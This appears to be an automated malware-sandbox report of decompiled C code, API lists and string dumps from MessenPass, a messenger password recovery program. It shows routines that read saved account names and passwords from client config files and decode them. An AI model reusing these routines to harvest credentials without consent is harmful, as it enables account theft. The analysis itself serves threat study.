                                				char _v55;
                                				char _v56;
                                				char _v57;
                                				char _v58;
                                				char _v59;
                                				void _v60;
                                				intOrPtr _v64;
                                				char _v68;
                                				void _v1091;
                                				char _v1092;
                                				char _v2108;
                                				void _v2116;
                                				void* __edi;
                                				char _t82;
                                				void* _t89;
                                				short* _t90;
                                				void* _t92;
                                				intOrPtr _t102;
                                				short* _t103;
                                				void* _t104;
                                				intOrPtr* _t105;
                                
                                				_v1092 = 0;
                                				memset( &_v1091, 0, 0x3ff);
                                				_t105 = _t104 + 0xc;
                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v1092, 0x400, 0, 0);
                                				_t82 = E004029D9( &_v1092,  &_v2116, 0x400);
                                				_t102 = _t82;
                                				_pop(_t92);
                                				if(_t102 > 8) {
                                					0x413d5c(0x48);
                                					_v68 = _t82;
                                					 *_t105 = 0x1000;
                                					0x413d5c();
                                					_v64 = _t82;
                                					_v60 = 0;
                                					_v59 = 0;
                                					_v58 = 0;
                                					_v57 = 0;
                                					_v56 = 0;
                                					_v55 = 0;
                                					_v54 = 0;
                                					_v53 = 0;
                                					_v52 = 0x99;
                                					_v51 = 0;
                                					_v50 = 0x86;
                                					_v49 = 0xa5;
                                					_v48 = 0x27;
                                					_v47 = 0xaa;
                                					_v46 = 0x9d;
                                					_v45 = 0x7f;
                                					_v44 = 0x58;
                                					_v43 = 0xaa;
                                					_v42 = 0xae;
                                					_v41 = 0xb9;
                                					_v40 = 0xb;
                                					_v39 = 0x47;
                                					_v38 = 0x3a;
                                					_v37 = 0x35;
                                					_v36 = 0xaa;
                                					_v35 = 0xe0;
                                					_v34 = 0xea;
                                					_v33 = 0x95;
                                					_v32 = 0x66;
                                					_v31 = 0xfb;
                                					_v30 = 0xe4;
                                					_v29 = 0x9f;
                                					_v28 = 0xcb;
                                					_v27 = 0xf7;
                                					_v26 = 0x16;
                                					_v25 = 0x1c;
                                					_v24 = 0xa3;
                                					_v23 = 0x92;
                                					_v22 = 0xe6;
                                					_v21 = 0x1c;
                                					_v20 = 0x96;
                                					_v19 = 6;
                                					_v18 = 0x9b;
                                					_v17 = 0x5b;
                                					_v16 = 0x29;
                                					_v15 = 0x30;
                                					_v14 = 0xbf;
                                					_v13 = 0xaf;
                                					_v12 = 0xec;
                                					_v11 = 0x11;
                                					_v10 = 0x29;
                                					_v9 = 0xc8;
                                					_v8 = 0x89;
                                					_v7 = 0x5b;
                                					_v6 = 0xb8;
                                					_v5 = 0x57;
                                					memcpy( &_v60,  &_v2116, 8);
                                					E00403632(_t92,  &_v68,  &_v60);
                                					_t70 = _t102 - 8; // -8
                                					_t88 = _t70;
                                					if(_t70 > 0x1fe) {
                                						_t88 = 0x1fe;
                                					}
                                					_t103 = _a4;
                                					_t89 = E0040373E(_t88, _t103,  &_v2108,  &_v68);
                                					 *((short*)(_t103 + 0x1fe)) = 0;
                                					0x413d56(_v68);
                                					0x413d56(_v64);
                                					return _t89;
                                				}
                                				_t90 = _a4;
                                				 *_t90 = 0;
                                				return _t90;
                                 			}

                                APIs
                                • memset.MSVCRT ref: 0040246E
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
                                  • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
                                • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
                                • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
                                • memcpy.MSVCRT ref: 004025B4
                                • ??3@YAXPAX@Z.MSVCRT ref: 004025F4
                                • ??3@YAXPAX@Z.MSVCRT ref: 004025FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
                                • String ID: '$)$)$0$5$:$G$W$X$[$[$f
                                • API String ID: 3606715663-4187034442
                                • Opcode ID: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                • Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
                                • Opcode Fuzzy Hash: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                • Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 84%
                                			E0040E0A1(intOrPtr* _a4, char* _a8) {
                                				char* _v8;
                                				void _v275;
                                				char _v276;
                                				void _v531;
                                				char _v532;
                                				intOrPtr _v536;
                                				intOrPtr _v540;
                                				int _v796;
                                				int _v1052;
                                				void _v2075;
                                				char _v2076;
                                				void _v3099;
                                				int _v3100;
                                				void _v4123;
                                				int _v4124;
                                				void _v5147;
                                				char _v5148;
                                				void* __ebx;
                                				void* __edi;
                                				int _t50;
                                				char* _t54;
                                				int _t89;
                                				int* _t105;
                                				void* _t110;
                                				void* _t111;
                                
                                				0x414060();
                                				_t89 = 0;
                                				_v276 = 0;
                                				memset( &_v275, 0, 0x104);
                                				_t50 = strlen(_a8);
                                				_t5 = strlen("accounts.ini") + 1; // 0x1
                                				_t111 = _t110 + 0x14;
                                				if(_t50 + _t5 >= 0x104) {
                                					_v276 = 0;
                                				} else {
                                					E00406B4B( &_v276, _a8, "accounts.ini");
                                				}
                                				_t54 = GetPrivateProfileIntA("Accounts", "num", _t89,  &_v276);
                                				_v8 = _t54;
                                				_a8 = _t89;
                                				if(_t54 > _t89) {
                                					do {
                                						_v532 = _t89;
                                						memset( &_v531, _t89, 0xfe);
                                						_v5148 = _t89;
                                						memset( &_v5147, _t89, 0x3ff);
                                						_v2076 = _t89;
                                						memset( &_v2075, _t89, 0x3ff);
                                						_v3100 = _t89;
                                						memset( &_v3099, _t89, 0x3ff);
                                						_v4124 = _t89;
                                						memset( &_v4123, _t89, 0x3ff);
                                						_push(_a8);
                                						sprintf( &_v532, "Account%3.3d");
                                						_t111 = _t111 + 0x48;
                                						GetPrivateProfileStringA( &_v532, "Account", 0x417c88,  &_v5148, 0x3ff,  &_v276);
                                						GetPrivateProfileStringA( &_v532, "Password", 0x417c88,  &_v2076, 0x3ff,  &_v276);
                                						if(_v2076 != _t89) {
                                							E004029D9( &_v2076,  &_v3100, 0x3ff);
                                							E0040DCF2( &_v4124,  &_v3100);
                                							_v1052 = _t89;
                                							_v796 = _t89;
                                							_v536 = 0xf;
                                							_v540 = 0x15;
                                							E00406958(0xff,  &_v796,  &_v4124);
                                							_t105 =  &_v1052;
                                							E00406958(0xff, _t105,  &_v5148);
                                							 *((intOrPtr*)( *_a4))(_t105);
                                							_t89 = 0;
                                						}
                                						_a8 =  &(_a8[1]);
                                						_t54 = _a8;
                                					} while (_t54 < _v8);
                                				}
                                				return _t54;
                                 			}

                                APIs
                                • memset.MSVCRT ref: 0040E0C7
                                • strlen.MSVCRT ref: 0040E0CF
                                • strlen.MSVCRT ref: 0040E0DB
                                • GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
                                • memset.MSVCRT ref: 0040E146
                                • memset.MSVCRT ref: 0040E15A
                                • memset.MSVCRT ref: 0040E16E
                                • memset.MSVCRT ref: 0040E182
                                • memset.MSVCRT ref: 0040E196
                                • sprintf.MSVCRT ref: 0040E1AA
                                • GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
                                • GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
                                • String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
                                • API String ID: 1850607429-3672167483
                                • Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                • Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
                                • Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                • Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi
                                • String ID: aim$aim_1$gg_1$icq$icq_1$jabber$jabber_1$msn$msn_1$yahoo
                                • API String ID: 1439213657-55676784
                                • Opcode ID: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                • Instruction ID: d6ea28dcef1c43b6611216e97a84ccd45a66baff8fdfae9b3007c4cad2cc92f3
                                • Opcode Fuzzy Hash: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                • Instruction Fuzzy Hash: 2F31307324E3127AF714B9336D02BEB27898F11B66F24082FFA09B11C1EE7D5A55419E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 633282248-1996832678
                                • Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                • Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
                                • Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                • Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 48%
                                			E0040A242(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                				signed int _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				signed int _v24;
                                				signed int _v28;
                                				void _v79;
                                				char _v80;
                                				void _v131;
                                				char _v132;
                                				void _v183;
                                				char _v184;
                                				char _v236;
                                				void _v491;
                                				char _v492;
                                				void* _t83;
                                				void* _t98;
                                				intOrPtr* _t100;
                                				intOrPtr* _t112;
                                				signed int _t113;
                                				intOrPtr _t131;
                                				signed int _t144;
                                				signed int _t145;
                                				signed int _t148;
                                				intOrPtr* _t149;
                                				void* _t150;
                                				void* _t152;
                                
                                				_t112 = __ebx;
                                				_v492 = 0;
                                				memset( &_v491, 0, 0xfe);
                                				_t113 = 0xc;
                                				memcpy( &_v236, 0x418424, _t113 << 2);
                                				asm("movsb");
                                				_t148 = 0;
                                				_v132 = 0;
                                				memset( &_v131, 0, 0x31);
                                				_v184 = 0;
                                				memset( &_v183, 0, 0x31);
                                				_v80 = 0;
                                				memset( &_v79, 0, 0x31);
                                				_t152 = _t150 + 0x3c;
                                				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
                                				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
                                				if(_t83 != 0xffffffff) {
                                					0x41241f(_t83,  &_v492);
                                					_push(_t83);
                                 					sprintf( &_v132, " bgcolor=\"%s\"");
                                					_t152 = _t152 + 0x14;
                                				}
                                 				E004067EC(_a4, "<table border=\"1\" cellpadding=\"5\">");
                                				_v8 = _t148;
                                				if( *((intOrPtr*)(_t112 + 0x20)) > _t148) {
                                					while(1) {
                                						_t144 =  *( *((intOrPtr*)(_t112 + 0x24)) + _v8 * 4);
                                						if( *((intOrPtr*)((_t144 << 4) +  *((intOrPtr*)(_t112 + 0x34)) + 4)) != _t148) {
                                							0x413d0c( &_v80, " nowrap");
                                						}
                                						_v28 = _v28 | 0xffffffff;
                                						_v24 = _v24 | 0xffffffff;
                                						_v20 = _v20 | 0xffffffff;
                                						_v16 = _t148;
                                						_t149 = _a8;
                                						 *((intOrPtr*)( *_t112 + 0x30))(5, _v8, _t149,  &_v28);
                                						0x41241f(_v28,  &_v184);
                                						 *((intOrPtr*)( *_t149))(_t144,  *(_t112 + 0x4c));
                                						0x41244b();
                                						 *((intOrPtr*)( *_t112 + 0x48))( *((intOrPtr*)(_t112 + 0x50)), _t149, _t144);
                                						_t98 =  *((intOrPtr*)( *_t112 + 0x14))();
                                						_t145 = _t144 * 0x14;
                                						if(_t98 == 0xffffffff) {
                                							0x413d0c( *(_t112 + 0x54),  *((intOrPtr*)(_t145 + _v12 + 0x10)));
                                						} else {
                                							0x41241f(_t98,  &_v492,  *((intOrPtr*)(_t145 + _v12 + 0x10)));
                                							_push(_t98);
                                 							sprintf( *(_t112 + 0x54), "<font color=\"%s\">%s</font>");
                                							_t152 = _t152 + 0x10;
                                						}
                                						_t100 =  *((intOrPtr*)(_t112 + 0x50));
                                						_t131 =  *_t100;
                                						if(_t131 == 0 || _t131 == 0x20) {
                                							0x413cf4(_t100, "&nbsp;");
                                						}
                                						0x4124d4( *((intOrPtr*)(_t112 + 0x58)),  *((intOrPtr*)(_t112 + 0x50)));
                                						sprintf( *(_t112 + 0x4c),  &_v236,  &_v132,  *(_t112 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t112 + 0x58)));
                                						E004067EC(_a4,  *(_t112 + 0x4c));
                                						_t152 = _t152 + 0x2c;
                                						_v8 = _v8 + 1;
                                						if(_v8 >=  *((intOrPtr*)(_t112 + 0x20))) {
                                							goto L14;
                                						}
                                						_t148 = 0;
                                					}
                                				}
                                				L14:
                                				E004067EC(_a4, "</table><p>");
                                				return E004067EC(_a4, 0x417de8);
                                 			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 710961058-601624466
                                • Opcode ID: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                • Instruction ID: 690333ed3326df0f6eed54148ed3e596883a3b3feedda5c4c7dc15c04e40e9a4
                                • Opcode Fuzzy Hash: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                • Instruction Fuzzy Hash: 5B61AE31900208AFDF14DF54CC86EDE7B79EF08314F1001AAF909AB1D2DB799A94CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 81%
                                			E0040DD65(intOrPtr* _a4, char* _a8, char* _a12, intOrPtr _a16) {
                                				void _v267;
                                				char _v268;
                                				void _v523;
                                				char _v524;
                                				intOrPtr _v528;
                                				intOrPtr _v532;
                                				int _v788;
                                				int _v1044;
                                				void _v2067;
                                				char _v2068;
                                				void _v3091;
                                				char _v3092;
                                				void _v4115;
                                				int _v4116;
                                				void* __ebx;
                                				void* __edi;
                                				int _t62;
                                				intOrPtr* _t95;
                                				int _t111;
                                				int _t118;
                                				intOrPtr* _t128;
                                				void* _t134;
                                				void* _t135;
                                				void* _t136;
                                
                                				0x414060();
                                				_t111 = 0;
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				_t62 = strlen(_a8);
                                				_t6 = strlen(_a12) + 1; // 0x1
                                				_t135 = _t134 + 0x14;
                                				if(_t62 + _t6 >= 0x104) {
                                					_v268 = 0;
                                				} else {
                                					E00406B4B( &_v268, _a8, _a12);
                                				}
                                				if(E004069D3( &_v268) != 0) {
                                					memset( &_v2067, _t111, 0x3ff);
                                					memset( &_v3091, _t111, 0x3ff);
                                					memset( &_v4115, _t111, 0x3ff);
                                					_v524 = _t111;
                                					memset( &_v523, _t111, 0xfe);
                                					_push(_t111);
                                					_a12 = _t111;
                                					_v2068 = _t111;
                                					_v3092 = _t111;
                                					_v4116 = _t111;
                                					sprintf( &_v524, "profile %d");
                                					_t136 = _t135 + 0x3c;
                                					GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
                                					GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
                                					if(_v2068 != _t111) {
                                						L7:
                                						while(_v3092 != _t111) {
                                							E0040DCF2( &_v4116,  &_v3092);
                                							_v528 = _a16;
                                							_v1044 = _t111;
                                							_v788 = _t111;
                                							_v532 = 3;
                                							E00406958(0xff,  &_v788,  &_v4116);
                                							_t128 =  &_v1044;
                                							E00406958(0xff, _t128,  &_v2068);
                                							_t118 = _v1044;
                                							_t95 = _t128;
                                							while(_t118 != 0) {
                                								if(_t118 >= 0x30 && _t118 <= 0x39) {
                                									_t95 = _t95 + 1;
                                									_t118 =  *_t95;
                                									continue;
                                								}
                                								L14:
                                								_push( &_v1044);
                                								if( *((intOrPtr*)( *_a4))() != 0) {
                                									_a12 =  &(_a12[1]);
                                									_push(_a12);
                                									_v2068 = 0;
                                									_v3092 = 0;
                                									_v4116 = 0;
                                									sprintf( &_v524, "profile %d");
                                									_t136 = _t136 + 0xc;
                                									GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
                                									GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
                                									if(_v2068 != 0) {
                                										_t111 = 0;
                                										goto L7;
                                									}
                                								}
                                								goto L16;
                                							}
                                							_v528 = 3;
                                							goto L14;
                                						}
                                					}
                                				}
                                				L16:
                                				return 1;
                                			}




























                                APIs
                                • memset.MSVCRT ref: 0040DD8B
                                • strlen.MSVCRT ref: 0040DD93
                                • strlen.MSVCRT ref: 0040DD9D
                                • memset.MSVCRT ref: 0040DDEB
                                • memset.MSVCRT ref: 0040DDF9
                                • memset.MSVCRT ref: 0040DE07
                                • memset.MSVCRT ref: 0040DE1F
                                • sprintf.MSVCRT ref: 0040DE46
                                • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
                                • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                • sprintf.MSVCRT ref: 0040DF73
                                • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
                                • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
                                • String ID: name$password$profile %d
                                • API String ID: 3544386798-2462908242
                                • Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                • Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
                                • Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                • Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: sprintf$memset$_mbscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 3402215030-3842416460
                                • Opcode ID: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                • Instruction ID: a5bfc8ec8e60557daa4b034ce7241d6b1778398f1e76627a293d7ac05c42f781
                                • Opcode Fuzzy Hash: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                • Instruction Fuzzy Hash: D24173B280121DBADB21EE54DC45FEB776CAF14309F0400ABF518E2142E6789FD88BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 94%
                                			E004010D0(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, signed short _a12) {
                                				void* __edi;
                                				void* _t28;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t44;
                                				void* _t49;
                                				signed short _t50;
                                				struct HWND__* _t52;
                                				signed short _t58;
                                				struct HWND__* _t60;
                                				void* _t70;
                                				void* _t71;
                                
                                				_t70 = __edx;
                                				_t28 = _a4 - 0x110;
                                				_t71 = __ecx;
                                				if(_t28 == 0) {
                                					SetWindowTextA( *(__ecx + 4), "MessenPass");
                                					SetDlgItemTextA( *(_t71 + 4), 0x3ea, _t71 + 0xc);
                                					SetDlgItemTextA( *(_t71 + 4), 0x3ec, _t71 + 0x10b);
                                					E00401085(_t71);
                                					E00406CAA(_t70,  *(_t71 + 4));
                                					L16:
                                					return 0;
                                				}
                                				_t37 = _t28 - 1;
                                				if(_t37 == 0) {
                                					_t38 = _a8;
                                					if(_t38 != 1 || _t38 >> 0x10 != 0) {
                                						goto L16;
                                					} else {
                                						EndDialog( *(__ecx + 4), 1);
                                						DeleteObject( *(_t71 + 0x20c));
                                						L7:
                                						return 1;
                                					}
                                				}
                                				_t44 = _t37 - 0x27;
                                				if(_t44 == 0) {
                                					if(_a12 != GetDlgItem( *(__ecx + 4), 0x3ec)) {
                                						goto L16;
                                					}
                                					SetBkMode(_a8, 1);
                                					SetTextColor(_a8, 0xc00000);
                                					return GetSysColorBrush(0xf);
                                				}
                                				_t49 = _t44 - 0xc8;
                                				if(_t49 == 0) {
                                					_t50 = _a12;
                                					_t52 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                					_push(_t50 >> 0x10);
                                					_a12 = _t52;
                                					if(ChildWindowFromPoint( *(_t71 + 4), _t50 & 0x0000ffff) != _a12) {
                                						goto L16;
                                					}
                                					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
                                					goto L7;
                                				}
                                				if(_t49 != 0) {
                                					goto L16;
                                				}
                                				_t58 = _a12;
                                				_t60 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                				_push(_t58 >> 0x10);
                                				_a12 = _t60;
                                				if(ChildWindowFromPoint( *(_t71 + 4), _t58 & 0x0000ffff) != _a12) {
                                					goto L16;
                                				}
                                				E00406D6B( *(_t71 + 4), _t71 + 0x10b);
                                				goto L7;
                                			}
















                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 00401118
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
                                  • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
                                • GetDlgItem.USER32(?,000003EC), ref: 00401161
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
                                • LoadCursorA.USER32(00000067), ref: 00401186
                                • SetCursor.USER32(00000000,?,?), ref: 0040118D
                                • GetDlgItem.USER32(?,000003EC), ref: 0040119D
                                • SetBkMode.GDI32(?,00000001), ref: 004011B1
                                • SetTextColor.GDI32(?,00C00000), ref: 004011BF
                                • GetSysColorBrush.USER32(0000000F), ref: 004011C7
                                • EndDialog.USER32(?,00000001), ref: 004011E5
                                • DeleteObject.GDI32(?), ref: 004011F1
                                • SetWindowTextA.USER32(?,MessenPass), ref: 00401204
                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
                                • String ID: MessenPass
                                • API String ID: 2410034309-1347981195
                                • Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                • Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
                                • Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                • Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _strcmpi
                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                • API String ID: 1439213657-1959339147
                                • Opcode ID: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                • Instruction ID: dd15bb3cc8bdf641e1a17555e2464251a39e176c696be1a009fdff25c7df10cc
                                • Opcode Fuzzy Hash: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                • Instruction Fuzzy Hash: DE011AB229A32178F9286A773C07BD70A488B51F7BF70065FF408E40C1FE5C968054AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00404D18(struct HINSTANCE__** __esi) {
                                				void* _t7;
                                				struct HINSTANCE__* _t8;
                                				_Unknown_base(*)()* _t14;
                                
                                				if( *__esi == 0) {
                                					_t8 = LoadLibraryA("advapi32.dll");
                                					 *__esi = _t8;
                                					__esi[1] = GetProcAddress(_t8, "CryptAcquireContextA");
                                					__esi[2] = GetProcAddress( *__esi, "CryptReleaseContext");
                                					__esi[3] = GetProcAddress( *__esi, "CryptCreateHash");
                                					__esi[4] = GetProcAddress( *__esi, "CryptGetHashParam");
                                					__esi[5] = GetProcAddress( *__esi, "CryptHashData");
                                					_t14 = GetProcAddress( *__esi, "CryptDestroyHash");
                                					__esi[6] = _t14;
                                					return _t14;
                                				}
                                				return _t7;
                                			}







                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                • API String ID: 2238633743-1621422469
                                • Opcode ID: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                • Instruction ID: 844867562ca0833f301e0ac6fd14d3db62e181894ebadeef568166b0b2be0524
                                • Opcode Fuzzy Hash: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                • Instruction Fuzzy Hash: 4FF09774940B48AECB30AF759C09E86BEE1EF9C7007224D2EE2C553650DA799084CE88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E00404578(wchar_t** __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                				signed int _v12;
                                				int _v16;
                                				signed int _v20;
                                				intOrPtr _v24;
                                				signed int _v28;
                                				intOrPtr _v32;
                                				void* _v36;
                                				int _v40;
                                				void* _v44;
                                				int _v48;
                                				intOrPtr _v52;
                                				intOrPtr _v56;
                                				char _v60;
                                				wchar_t* _v64;
                                				int _v68;
                                				intOrPtr _v72;
                                				intOrPtr _v76;
                                				char _v80;
                                				intOrPtr _v84;
                                				char _v88;
                                				intOrPtr _v92;
                                				char _v96;
                                				intOrPtr _v100;
                                				char _v104;
                                				intOrPtr _v108;
                                				char _v112;
                                				long _v148;
                                				short _v666;
